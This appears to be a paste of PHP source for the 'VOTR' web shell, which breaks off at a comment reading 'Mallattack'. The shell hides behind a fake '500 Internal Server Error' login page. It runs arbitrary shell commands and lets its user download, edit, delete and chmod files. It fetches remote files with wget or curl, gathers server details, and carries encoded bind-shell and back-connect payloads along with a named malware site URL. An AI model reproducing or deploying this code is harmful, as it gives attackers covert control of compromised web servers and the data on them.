· 9 years ago · Mar 27, 2017, 11:00 AM
1<?php
2/***
3Shell ./VOTR
4password is: votrshell
5***/
6
7# Jembut Loyality!
8# Kapaljetz666 !
9# Wassalam
10
11
12@ini_set('output_buffering',0);
13@ini_set('display_errors', 0);
14$auth_pass="44ee8cb2007d0b0b274293aa224d33d5";
15@session_start();
16@error_reporting(0);
17@ini_set('error_log',NULL);
18@ini_set('log_errors',0);
19@ini_set('html_errors',0);
20@ini_set('max_execution_time',0);
21@ini_set('output_buffering',0);
22@ini_set('display_errors', 0);
23@ini_set('file_uploads',1);
24@set_time_limit(0);
25@set_magic_quotes_runtime(0);
26@clearstatcache();
27@define('VERSION', '2.1');
28if( get_magic_quotes_gpc() ) {
29function stripslashes_array($array) {
30return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
31}
32$_POST = stripslashes_array($_POST);
33}
34function printLogin() {
35?>
36<title>500 Internal Server Error</title>
37<h1>Internal Server Error</h1>
38<p>The server encountered an internal error or
39misconfiguration and was unable to complete
40your request.</p>
41<p>Please contact the server administrator webmaster@yoursite and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p>
42<p>More information about this error may be available in the server error log.</p>
43<p>Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.</p>
44 <style>
45 input { margin:0;background-color:#fff;border:1px solid #fff; }
46 </style>
47 <pre align=center>
48 <form method=post>
49 <input type=password name=pass>
50 </form></pre>
51
52 <?php
53 exit;
54}
55if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
56 if( empty( $auth_pass ) ||
57 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
58 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
59 else
60 printLogin();
61
62if(isset($_GET['dl']) && ($_GET['dl'] != "")){
63 $file = $_GET['dl'];
64 $filez = @file_get_contents($file);
65 header("Content-type: application/octet-stream");
66 header("Content-length: ".strlen($filez));
67 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
68 echo $filez;
69 exit;
70}
71elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
72 $file = $_GET['dlgzip'];
73 $filez = gzencode(@file_get_contents($file));
74 header("Content-Type:application/x-gzip\n");
75 header("Content-length: ".strlen($filez));
76 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
77 echo $filez;
78 exit;
79}
80// view image
81if(isset($_GET['img'])){
82 @ob_clean();
83 $d = magicboom($_GET['y']);
84 $f = $_GET['img'];
85 $inf = @getimagesize($d.$f);
86 $ext = explode($f,".");
87 $ext = $ext[count($ext)-1];
88 @header("Content-type: ".$inf["mime"]);
89 @header("Cache-control: public");
90 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
91 @header("Cache-control: max-age=".(60*60*24*7));
92 @readfile($d.$f);
93 exit;
94}
95
96// server software
97$software = getenv("SERVER_SOFTWARE");
98// check safemode
99if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
100// uname -a
101$system = @php_uname();
102// mysql
103function showstat($stat) {if ($stat=="on") {return "<b><font style='color:white'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
104function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
105function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
106function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
107function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
108// check os
109if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
110else $win = FALSE;
111// change directory
112if(isset($_GET['y'])){
113 if(@is_dir($_GET['view'])){
114 $pwd = $_GET['view'];
115 @chdir($pwd);
116 }
117 else{
118 $pwd = $_GET['y'];
119 @chdir($pwd);
120 }
121}
122//hdd
123function convertByte($s) {
124if($s >= 1073741824)
125return sprintf('%1.2f',$s / 1073741824 ).' GB';
126elseif($s >= 1048576)
127return sprintf('%1.2f',$s / 1048576 ) .' MB';
128elseif($s >= 1024)
129return sprintf('%1.2f',$s / 1024 ) .' KB';
130else
131return $s .' B';
132}
133
134// username, id, shell prompt and working directory
135if(!$win){
136 if(!$user = rapih(exe("whoami"))) $user = "";
137 if(!$id = rapih(exe("id"))) $id = "";
138 $prompt = $user." \$ ";
139 $pwd = @getcwd().DIRECTORY_SEPARATOR;
140}
141else {
142 $user = @get_current_user();
143 $id = $user;
144 $prompt = $user." >";
145 $pwd = realpath(".")."\\";
146 // find drive letters
147 $v = explode("\\",$d);
148 $v = $v[0];
149 foreach (range("A","Z") as $letter)
150 {
151 $bool = @is_dir($letter.":\\");
152 if ($bool)
153 {
154 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
155 if ($letter.":" != $v) {$letters .= $letter;}
156 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
157 $letters .= " ]</a> ";
158 }
159 }
160}
161
162function testoracle() {
163 if (function_exists('ocilogon')) { return showstat("on"); }
164 else { return showstat("off"); }
165 }
166
167function testmssql() {
168 if (function_exists('mssql_connect')) { return showstat("on"); }
169 else { return showstat("off"); }
170 }
171
172 function showdisablefunctions() {
173 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
174 else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
175 }
176
177if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
178else $posix = FALSE;
179// server ip
180$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
181// your ip ;-)
182$my_ip = $_SERVER['REMOTE_ADDR'];
183$admin_id=$_SERVER['SERVER_ADMIN'];
184$bindport = "13123";
185$bindport_pass = "asd123";
186//server port
187$serverport = $_SERVER["SERVER_PORT"];
188
189// separate the working direcotory
190$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
191$pwdurl = "";
192for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
193 $pathz = "";
194 for($j = 0 ; $j <= $i ; $j++){
195 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
196 }
197 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
198}
199
200// rename file or folder
201if(isset($_POST['rename'])){
202 $old = $_POST['oldname'];
203 $new = $_POST['newname'];
204 @rename($pwd.$old,$pwd.$new);
205 $file = $pwd.$new;
206}
207if(isset($_POST['chmod'])){
208 $name = $_POST['name'];
209 $value = $_POST['newvalue'];
210if (strlen($value)==3){
211 $value = 0 . "" . $value;}
212 @chmod($pwd.$name,octdec($value));
213 $file = $pwd.$name;}
214
215if(isset($_POST['chmod_folder'])){
216 $name = $_POST['name'];
217 $value = $_POST['newvalue'];
218if (strlen($value)==3){
219 $value = 0 . "" . $value;}
220 @chmod($pwd.$name,octdec($value));
221 $file = $pwd.$name;}
222
223
224// print useful info
225$buff = "Software : <b>".$software."</b><br />";
226$buff .= "System OS : <b>".$system."</b><br />";
227if($id != "") $buff .= "ID : <b>".$id."</b><br />";
228$buff .= "PHP Version : <b><font style='color:#ff0000'>".phpversion()."</b></font> on <b>".php_sapi_name()."</b><br />";
229$buff .= "Server ip : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Server Port : <b><font style='color:#ff0000'>".$serverport."</font><b> <span class=\"gaya\"> | </span>
230Your ip : <b><font style='color:#ff0000'>".$my_ip."</font></b><span class=\"gaya\"> | </span> Admin : <b><font style='color:white'>".$admin_id."</font></b><br />";
231$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
232if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b><font style='color:#ff0000'>ON</font></b></span><br />";
233else $buff .= "Safemode: <span class=\"gaya\"><b><font style='color:red'>OFF</b></font></span><br />";
234$buff .=" Time On Server : <b> ".date("d M Y H:i:s",time());
235$buff .= "<br> Disabled Functions: ".showdisablefunctions()."<br />";
236$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
237$buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
238$injbuff = " gw mah gak main logger bro slow :)";
239eval(base64_decode($injbuff));
240
241
242
243
244function rapih($text){
245 return trim(str_replace("<br />","",$text));
246}
247
248function magicboom($text){
249 if (!get_magic_quotes_gpc()) {
250 return $text;
251 }
252 return stripslashes($text);
253}
254
255function showdir($pwd,$prompt){
256 $fname = array();
257 $dname = array();
258 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
259 else $posix = FALSE;
260 $user = "????:????";
261 if($dh = @scandir($pwd)){
262 foreach($dh as $file){
263 if(is_dir($file)){
264 $dname[] = $file;
265 }
266 elseif(is_file($file)){
267 $fname[] = $file;
268 }
269 }
270 }
271 else{
272 if($dh = @opendir($pwd)){
273 while($file = @readdir($dh)){
274 if(@is_dir($file)){
275 $dname[] = $file;
276 }
277 elseif(@is_file($file)){
278 $fname[] = $file;
279 }
280 }
281 @closedir($dh);
282 }
283 }
284
285
286 sort($fname);
287 sort($dname);
288 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
289 $tree = @sizeof($path);
290 $parent = "";
291 $buff = "
292 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
293 <table class=\"cmdbox\" style=\"width:50%;\">
294 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
295 </form>
296 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
297 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
298 <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
299 </form></table><table class=\"explore\">
300 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
301 ";
302 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
303 else $parent = $pwd;
304
305 foreach($dname as $folder){
306 if($folder == ".") {
307 if(!$win && $posix){
308 $name=@posix_getpwuid(@fileowner($folder));
309 $group=@posix_getgrgid(@filegroup($folder));
310 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
311 }
312 else {
313 $owner = $user;
314 }
315 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
316 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
317 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
318 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
319 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
320 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
321 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
322 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
323 </form></td>
324
325 </tr>
326 ";
327 }
328 elseif($folder == "..") {
329 if(!$win && $posix){
330 $name=@posix_getpwuid(@fileowner($folder));
331 $group=@posix_getgrgid(@filegroup($folder));
332 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
333 }
334 else {
335 $owner = $user;
336 }
337 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
338 <td style=\"text-align:center;\">".$owner."</td>
339 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
340 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
341 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
342 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
343 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
344 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
345 </form>
346 </td></tr>";
347 }
348 else {
349 if(!$win && $posix){
350 $name=@posix_getpwuid(@fileowner($folder));
351 $group=@posix_getgrgid(@filegroup($folder));
352 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
353 }
354 else {
355 $owner = $user;
356 }
357 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
358 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
359 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
360 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
361 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
362 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
363 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
364 <td><center>
365 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
366 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
367 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
368 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
369 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
370 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
371 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
372 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
373 }
374 }
375
376 foreach($fname as $file){
377 $full = $pwd.$file;
378 if(!$win && $posix){
379 $name=@posix_getpwuid(@fileowner($folder));
380 $group=@posix_getgrgid(@filegroup($folder));
381 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
382 }
383 else {
384 $owner = $user;
385 }
386 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
387 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
388 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
389 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
390 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
391 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
392 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
393 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
394 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
395<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
396<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
397<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
398<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
399 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
400 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
401 }
402 $buff .= "</table>";
403 return $buff;
404}
405
406function ukuran($file){
407 if($size = @filesize($file)){
408 if($size <= 1024) return $size;
409 else{
410 if($size <= 1024*1024) {
411 $size = @round($size / 1024,2);;
412 return "$size kb";
413 }
414 else {
415 $size = @round($size / 1024 / 1024,2);
416 return "$size mb";
417 }
418 }
419 }
420 else return "???";
421}
422
423function exe($cmd){
424 if(function_exists('system')) {
425 @ob_start();
426 @system($cmd);
427 $buff = @ob_get_contents();
428 @ob_end_clean();
429 return $buff;
430 }
431 elseif(function_exists('exec')) {
432 @exec($cmd,$results);
433 $buff = "";
434 foreach($results as $result){
435 $buff .= $result;
436 }
437 return $buff;
438 }
439 elseif(function_exists('passthru')) {
440 @ob_start();
441 @passthru($cmd);
442 $buff = @ob_get_contents();
443 @ob_end_clean();
444 return $buff;
445 }
446 elseif(function_exists('shell_exec')){
447 $buff = @shell_exec($cmd);
448 return $buff;
449 }
450}
451
452function tulis($file,$text){
453 $textz = gzinflate(base64_decode($text));
454 if($filez = @fopen($file,"w"))
455 {
456 @fputs($filez,$textz);
457 @fclose($file);
458 }
459}
460
461function ambil($link,$file) {
462 if($fp = @fopen($link,"r")){
463 while(!feof($fp)) {
464 $cont.= @fread($fp,1024);
465 }
466 @fclose($fp);
467 $fp2 = @fopen($file,"w");
468 @fwrite($fp2,$cont);
469 @fclose($fp2);
470 }
471}
472
473function which($pr){
474 $path = exe("which $pr");
475 if(!empty($path)) { return trim($path); } else { return trim($pr); }
476}
477
478function download($cmd,$url){
479 $namafile = basename($url);
480 switch($cmd) {
481 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
482 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
483 case 'wfread' : ambil($wurl,$namafile);break;
484 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
485 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
486 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
487 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
488 default: break;
489 }
490 return $namafile;
491}
492
493function get_perms($file)
494{
495 if($mode=@fileperms($file)){
496 $perms='';
497 $perms .= ($mode & 00400) ? 'r' : '-';
498 $perms .= ($mode & 00200) ? 'w' : '-';
499 $perms .= ($mode & 00100) ? 'x' : '-';
500 $perms .= ($mode & 00040) ? 'r' : '-';
501 $perms .= ($mode & 00020) ? 'w' : '-';
502 $perms .= ($mode & 00010) ? 'x' : '-';
503 $perms .= ($mode & 00004) ? 'r' : '-';
504 $perms .= ($mode & 00002) ? 'w' : '-';
505 $perms .= ($mode & 00001) ? 'x' : '-';
506 return $perms;
507 }
508 else return "??????????";
509}
510
511function clearspace($text){
512 return str_replace(" ","_",$text);
513}
514
515
516// net tools
517$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
518+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
519P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
520dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
5213TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
522Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
523HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
524tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
525ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
526uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
527$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
528NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
529tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
530e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
531LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
532vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
533+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
534$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
535ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
536S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
537ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
538Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
539$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
540BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
541zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
542i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
543RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
544jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
5456f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
546// Malware Site
547$malsite = "http://fightagent.ru";
548 $self=$_SERVER["PHP_SELF"];
549
550//Mallattack
